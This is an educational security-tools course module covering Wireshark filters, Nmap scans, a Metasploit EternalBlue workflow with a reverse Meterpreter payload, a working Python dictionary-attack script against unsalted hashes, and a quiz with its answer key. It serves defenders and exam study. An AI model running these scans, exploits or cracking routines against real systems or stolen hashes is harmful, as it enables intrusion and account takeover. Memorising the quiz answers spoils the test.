MODULE 06 — SECURITY TOOLS

Essential Security Tools

Every security professional needs a toolbox: Wireshark for traffic analysis, Nmap for reconnaissance, and Metasploit for exploitation. These are the foundational tools of both red team and blue team operations.

The Security Professional's Toolbox

Security work without tools is like surgery without instruments. Whether you're defending a network (blue team) or testing its defenses (red team), you need tools for reconnaissance, analysis, exploitation, and reporting.

Reconnaissance

Discover hosts, services, and vulnerabilities on a network. The first step in any assessment.

Analysis

Capture and examine network traffic, logs, and artifacts. Find the needle in the haystack.

Exploitation

Validate vulnerabilities by safely exploiting them. Prove impact to stakeholders.

Wireshark

Network Protocol Analyzer

What it does: Captures and analyzes network packets in real time. Think of it as a microscope for network traffic. Every packet that reaches your capture interface is decoded and displayed: headers, payloads, protocols, everything. On a switched network that normally means only traffic to or from your own host (plus broadcast and multicast); to see other hosts' conversations you capture from a SPAN/mirror port, a network tap, or a host that sits inline.

BLUE TEAM USES
  • Investigate suspicious traffic patterns
  • Detect data exfiltration (large or unusual outbound transfers)
  • Analyze malware C2 (command & control) callbacks
  • Verify encryption is working (TLS handshake analysis)
  • Troubleshoot network connectivity issues
RED TEAM USES
  • Capture credentials sent in plaintext (HTTP, FTP, Telnet)
  • Analyze target network topology and services
  • Validate man-in-the-middle attacks
  • Detect DNS exfiltration channels
  • Protocol fuzzing and vulnerability research
Key display filters:
http.request.method == "POST" — Show only HTTP POST requests (login forms, file uploads)
ip.addr == 192.168.1.100 — All traffic to/from a specific IP
tcp.port == 443 — All traffic on TCP port 443 (normally HTTPS; the protocol filter tls matches TLS on any port)
dns.qry.name contains "evil" — DNS queries whose name contains "evil"
tcp.flags.syn == 1 && tcp.flags.ack == 0 — Bare SYN packets, i.e. handshake starts; a burst of these from one source to many ports is the signature of a port scan

Nmap

Network Mapper — Port Scanner & Recon Tool

What it does: Discovers hosts and services on a network by sending carefully crafted packets and analyzing responses. Nmap is the Swiss Army knife of network reconnaissance — it can identify live hosts, open ports, running services, OS versions, and even known vulnerabilities.

Essential Nmap commands:
nmap -sn 192.168.1.0/24 — Host discovery only (ping sweep; no port scan)
nmap -sS 192.168.1.100 — SYN scan (the default when run as root; fast, never completes the TCP handshake)
nmap -sV -sC 192.168.1.100 — Version detection + default NSE scripts (identify exact service versions)
nmap -O 192.168.1.100 — OS fingerprinting (needs root; guesses the operating system from TCP/IP stack behaviour)
nmap -p- 192.168.1.100 — Scan all 65,535 TCP ports (thorough but slow; by default Nmap scans the 1,000 most common)
nmap -A 192.168.1.100 — Aggressive scan (OS + version + scripts + traceroute)
nmap --script vuln 192.168.1.100 — Run the scripts in the vuln category (vulnerability checks)
nmap -oA scan 192.168.1.100 — Save normal, XML and grepable output (scan.nmap, scan.xml, scan.gnmap) so results can be diffed later and parsed by other tools
Legal warning: Never scan networks you don't own or have explicit written permission to test. Unauthorized port scanning can be illegal in many jurisdictions.
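The -oX / -oA output is what makes Nmap results machine-readable, and triaging a large scan usually starts by reducing the XML to "which hosts have which open ports, running what". The script below is an added example, not part of this module and not Nmap's own code: it parses a constructed Nmap XML report (the sample is embedded in the script and written in Nmap's output schema) into per-host findings and reports only the open ports with their detected products and versions. All function names are this example's own; replace SAMPLE_NMAP_XML with the contents of your scan.xml to run it on a real report.

```python
"""Triage an Nmap XML report (nmap ... -oX scan.xml or -oA basename) into
per-host open-port findings.

Added example, not from this module or from Nmap: the XML below is a
constructed sample written in Nmap's own output schema, and the function
names are this example's own. Swap SAMPLE_NMAP_XML for open("scan.xml").read().
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -oX - 192.168.1.100-101" version="7.94">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.168.1.100" addrtype="ipv4"/>
    <hostnames><hostname name="web.lab.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1" extrainfo="Ubuntu Linux; protocol 2.0" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.51" extrainfo="(Ubuntu)" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="filtered" reason="no-response"/>
        <service name="https" method="table" conf="3"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="closed" reason="reset"/>
        <service name="mysql" method="table" conf="3"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.1.101" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str) -> list:
    """Flatten every scanned port of every live host into a dict.
    ElementTree is fine for reports you generated yourself; for XML handed to
    you by an untrusted party parse with defusedxml instead (entity expansion)."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                       # down hosts carry no port data
        addr_el = host.find("address[@addrtype='ipv4']")
        hn_el = host.find("hostnames/hostname")
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            sget = svc.get if svc is not None else (lambda k, d="": d)
            findings.append({
                "host": addr_el.get("addr") if addr_el is not None else "?",
                "hostname": hn_el.get("name") if hn_el is not None else "",
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "reason": state.get("reason", "") if state is not None else "",
                "service": sget("name", ""),
                "product": sget("product", ""),
                "version": sget("version", ""),
                "conf": int(sget("conf", "0")),   # Nmap's 0-10 confidence in the service guess
            })
    return findings


def open_ports(findings: list) -> list:
    return [f for f in findings if f["state"] == "open"]


def banner(f: dict) -> str:
    """Render one finding the way a report line reads: 80/tcp http Apache httpd 2.4.51"""
    parts = [f"{f['port']}/{f['proto']}", f["service"] or "?"]
    parts += [x for x in (f["product"], f["version"]) if x]
    return " ".join(parts)


def report(findings: list) -> dict:
    """{host: [banner, ...]} for open ports only, the list a pentester triages first."""
    out = {}
    for f in open_ports(findings):
        out.setdefault(f["host"], []).append(banner(f))
    return out


if __name__ == "__main__":
    findings = parse_nmap_xml(SAMPLE_NMAP_XML)
    for host, lines in report(findings).items():
        name = next((f["hostname"] for f in findings if f["host"] == host and f["hostname"]), "")
        print(f"{host} {name}".rstrip())
        for line in lines:
            print("   ", line)
    low = [f for f in open_ports(findings) if f["conf"] < 5]
    if low:
        print("low-confidence service guesses (re-run with -sV --version-intensity 9):", [banner(f) for f in low])
```

The state and reason fields are worth keeping even though only open ports are reported: "filtered / no-response" on 443 is a firewall clue, and a "closed / reset" port proves the host answered at all. The conf value is Nmap's own confidence in the service identification; entries below 5 usually come from the port-number table rather than a probe response and deserve a closer look before anyone searches for exploits against the guessed version.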

Metasploit Framework

Exploitation & Penetration Testing Platform

What it does: A massive open-source framework containing thousands of exploits, payloads, and auxiliary modules for penetration testing. If Nmap finds the unlocked door, Metasploit walks through it. Used by pentesters to safely validate vulnerabilities and demonstrate real-world impact.

Typical Metasploit workflow:
msfconsole — Launch the Metasploit console
search eternalblue — Search modules by name, keyword or CVE (search cve:2017-0144 finds the same module)
use exploit/windows/smb/ms17_010_eternalblue — Select an exploit module
set RHOSTS 192.168.1.100 — Set the target IP (a range or a file of targets also works)
set PAYLOAD windows/x64/meterpreter/reverse_tcp — Choose a payload; a reverse payload also needs set LHOST <your IP> so the target knows where to connect back
show options — Confirm every required option is set before launching
check — Where the module supports it, test whether the target is vulnerable without launching the exploit
exploit — Execute the exploit; on success a Meterpreter session opens on your listener
Exploits

Code that takes advantage of a vulnerability (e.g., buffer overflow, SQL injection)

Payloads

Code that runs after exploitation (reverse shell, Meterpreter, command execution)

Auxiliary

Non-exploit modules: scanners, fuzzers, DoS testers, credential checkers

Other Essential Tools

Burp Suite

Web application security testing platform. Intercepts and modifies HTTP requests between browser and server, scans for vulnerabilities (XSS, SQLi), fuzzes parameters. The standard tool for web app pentesters; the free Community edition includes the proxy and Repeater but not the active scanner.

John the Ripper / Hashcat

Offline password-cracking tools: given captured hashes and a wordlist or mask, they generate candidate passwords, hash each one, and compare. John is traditionally CPU-focused (with OpenCL support for some formats); Hashcat is built around GPU acceleration and is far faster against fast hashes such as NTLM or MD5. Used to test password strength and crack captured hashes; both support hundreds of hash formats. Slow, salted hashes (bcrypt, scrypt, Argon2) cut the candidate rate by orders of magnitude, which is exactly why they are the recommended way to store passwords.
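What these tools do is simple enough to show in a few dozen lines, and seeing the loop makes clear why the cost per hash is the whole game. The script below is an added example, not code from this module or from John/Hashcat: it runs a dictionary attack with a handful of Hashcat-style mangling rules against a constructed list of unsalted SHA-256 hashes, then measures how many candidates per second this CPU manages for SHA-256 versus a salted PBKDF2. The wordlist, the "leaked" hash list and every function name are constructed for illustration; a real run would read rockyou.txt and a dump file.

```python
"""Offline dictionary attack with a few Hashcat-style mangling rules.

Added example, not from this module or from John/Hashcat: the wordlist,
the "leaked" hash list and every function name below are constructed for
illustration. Real dumps and wordlists would be read from files.
"""
import hashlib
import time

# Constructed wordlist (a real run would use rockyou.txt or similar).
WORDLIST = ["password", "letmein", "summer", "dragon", "qwerty", "welcome"]


def sha256_hex(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


# Constructed "dump": unsalted SHA-256 of four passwords, mapped to the user
# they belong to. Three are weak variants of dictionary words; the fourth is random.
LEAKED_HASHES = {
    sha256_hex("password"): "alice",
    sha256_hex("letmein!"): "bob",
    sha256_hex("Summer2024"): "carol",
    sha256_hex("vG9#xQ2pL!m8Tz4w"): "dave",
}


def apply_rules(word: str) -> set:
    """A tiny subset of Hashcat's rule language, one rule per line."""
    return {
        word,                        # :        keep as-is
        word.capitalize(),           # c        capitalize
        word + "1",                  # $1       append 1
        word + "!",                  # $!       append !
        word + "123",                # $1$2$3   append 123
        word.capitalize() + "2024",  # c$2$0$2$4
        word.capitalize() + "!",     # c$!
    }


def crack(hashes: dict, wordlist, hash_fn=sha256_hex, rules=apply_rules):
    """Return ({username: plaintext}, guesses) for every hash a candidate matches.

    This loop is the entire attack: hash each candidate and look it up in the
    target set. Each guess costs one hash, which is why an unsalted fast hash is
    cheap to attack and a salted slow KDF is not (the salt also stops one guess
    from being checked against every user at once)."""
    remaining = dict(hashes)
    recovered = {}
    guesses = 0
    for word in wordlist:
        for cand in rules(word):
            if not remaining:
                return recovered, guesses
            guesses += 1
            user = remaining.pop(hash_fn(cand), None)
            if user is not None:
                recovered[user] = cand
    return recovered, guesses


def candidates_per_second(hash_fn, seconds: float = 0.2) -> float:
    """Rough single-thread throughput of one hashing routine on this CPU."""
    n, stop = 0, time.perf_counter() + seconds
    while time.perf_counter() < stop:
        hash_fn("candidate%d" % n)
        n += 1
    return n / seconds


def pbkdf2_hex(s: str, salt: bytes = b"per-user-salt", rounds: int = 100_000) -> str:
    """Slow, salted KDF for comparison (bcrypt, scrypt or Argon2 are the usual choices)."""
    return hashlib.pbkdf2_hmac("sha256", s.encode(), salt, rounds).hex()


if __name__ == "__main__":
    found, guesses = crack(LEAKED_HASHES, WORDLIST)
    print(f"{len(found)}/{len(LEAKED_HASHES)} recovered in {guesses} guesses: {found}")
    fast = candidates_per_second(sha256_hex)
    slow = candidates_per_second(pbkdf2_hex)
    print(f"sha256: {fast:,.0f} cand/s   pbkdf2(100k rounds): {slow:,.0f} cand/s   "
          f"ratio ~{fast / max(slow, 1):,.0f}x")
```

Three of the four hashes fall in well under fifty guesses because the rules capture the mangling people actually do (capitalize, append a year or a symbol); the random sixteen-character password never appears in any candidate set and survives. Run the timing part and the ratio between the SHA-256 and PBKDF2 rates is the factor a slow KDF adds to an attacker's bill, per user, which is the argument for bcrypt/scrypt/Argon2 in one number.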

Gobuster / FFUF

Directory/file brute-forcing tools. Discover hidden pages, API endpoints, and subdomains on web servers. Essential for web application recon.

tcpdump

Command-line packet analyzer. Lightweight alternative to Wireshark for servers without a GUI. Perfect for capturing traffic on remote Linux servers via SSH.

Hydra

Online brute-force tool for login services (SSH, FTP, HTTP, RDP). Tests username/password combinations directly against a live network service. Because the attack is online it is noisy, rate-limited by the target, and can lock out accounts; prefer offline cracking whenever you can obtain the hashes instead.

Netcat (nc)

The "Swiss Army knife" of networking. Read/write data across network connections. Used for port listening, file transfer, reverse shells, banner grabbing.

Nmap Scan Types Explained

-sS — SYN Stealth Scan (Default)

Sends a SYN packet. If SYN/ACK comes back the port is open; if RST comes back it is closed; no reply means filtered. Nmap answers the SYN/ACK with a RST instead of completing the handshake, so the connection is never established and the application never sees it or logs it. "Stealth" is relative: firewalls and intrusion detection systems still see and log the SYN.

Client --[SYN]--> Server --[SYN/ACK]--> Client --[RST]--> (connection never completed)
-sT — TCP Connect Scan

Completes the full TCP three-way handshake through the operating system's connect() call. More reliable but louder: the connection reaches the application and appears in its logs. Nmap falls back to this scan when the user lacks raw-socket privileges (i.e. is not root).

Client --[SYN]--> Server --[SYN/ACK]--> Client --[ACK]--> (full connection, then close)
-sU — UDP Scan

Scans UDP ports (DNS:53, DHCP:67/68, SNMP:161, TFTP:69). Very slow because UDP is connectionless: an open port usually sends nothing back, so Nmap reports it as open|filtered unless a protocol-specific payload (or a -sV probe) elicits a reply. An ICMP "port unreachable" means closed, and most hosts rate-limit those replies, which is where the time goes.

-sV — Version Detection

After finding open ports, sends probes to determine the exact service and version running. Turns "port 80 open" into "Apache httpd 2.4.51 (Ubuntu)". Critical for finding exploitable versions.

--script — NSE (Nmap Scripting Engine)

Nmap ships 600+ Lua scripts for vulnerability checks, brute-forcing, service enumeration, and more. Categories include default (the set -sC runs), safe, intrusive, vuln, discovery, auth and brute.

Wireshark Protocol Analysis

Understanding packet structure is key to effective analysis. Every captured frame contains nested protocol headers, each one carrying the next as its payload:

Layer 2 — Ethernet Frame:   Dst MAC | Src MAC | EtherType (0x0800 = IPv4, 0x86DD = IPv6, 0x0806 = ARP)
Layer 3 — IP Header:        Src IP | Dst IP | TTL | Protocol (6 = TCP, 17 = UDP, 1 = ICMP)
Layer 4 — TCP Header:       Src Port | Dst Port | Seq# | Ack# | Flags (SYN/ACK/FIN/RST)
Layer 7 — Application Data: HTTP Request/Response | DNS Query | TLS Handshake

Security+ Exam Focus (Domain 4: Security Operations)

Interactive Tool Simulators

The live page embeds three safe simulators here (no real networks are scanned and no real exploits are run): an Nmap console with a simulated 10.0.0.0/24 target network (try nmap -sS 10.0.0.1, nmap -sV 10.0.0.1, nmap -sn 10.0.0.0/24, nmap -O 10.0.0.1, nmap -A 10.0.0.1), a packet capture viewer whose packets can be clicked open just like Wireshark's detail pane, and a Metasploit console (try search eternalblue, use exploit/windows/smb/ms17_010_eternalblue, show options, set RHOSTS 10.0.0.5, exploit).

Knowledge Check

1. Which tool is primarily used for capturing and analyzing network traffic?
   a) Nmap   b) Metasploit   c) Wireshark   d) Hydra

2. The Nmap flag '-sS' performs what type of scan?
   a) UDP scan   b) Full TCP connect scan   c) SYN stealth scan   d) Version detection scan

3. In Metasploit, what is a 'payload'?
   a) The vulnerability being exploited   b) Code that runs after exploitation   c) The target IP address   d) A scanning module

4. Which Wireshark filter would show only HTTP POST requests?
   a) tcp.port == 80   b) http.request.method == "POST"   c) http.response.code == 200   d) ip.proto == http

5. Which Nmap flag performs OS fingerprinting?
   a) -sV   b) -sS   c) -O   d) -sU

6. What is the primary purpose of a vulnerability scanner (like Nessus)?
   a) Exploit vulnerabilities automatically   b) Identify known vulnerabilities without exploiting them   c) Block incoming network attacks   d) Encrypt network traffic

7. tcpdump is best described as:
   a) A GUI packet analyzer   b) A command-line packet capture tool   c) A password cracking utility   d) A web vulnerability scanner

8. Before performing a penetration test, you MUST have:
   a) The latest version of Kali Linux   b) Written authorization and defined scope   c) A VPN connection   d) Root access to the target

Answers: 1 c, 2 c, 3 b, 4 b, 5 c, 6 b, 7 b, 8 b.

All certification names are referenced for educational purposes only. This project is not affiliated with any certification body.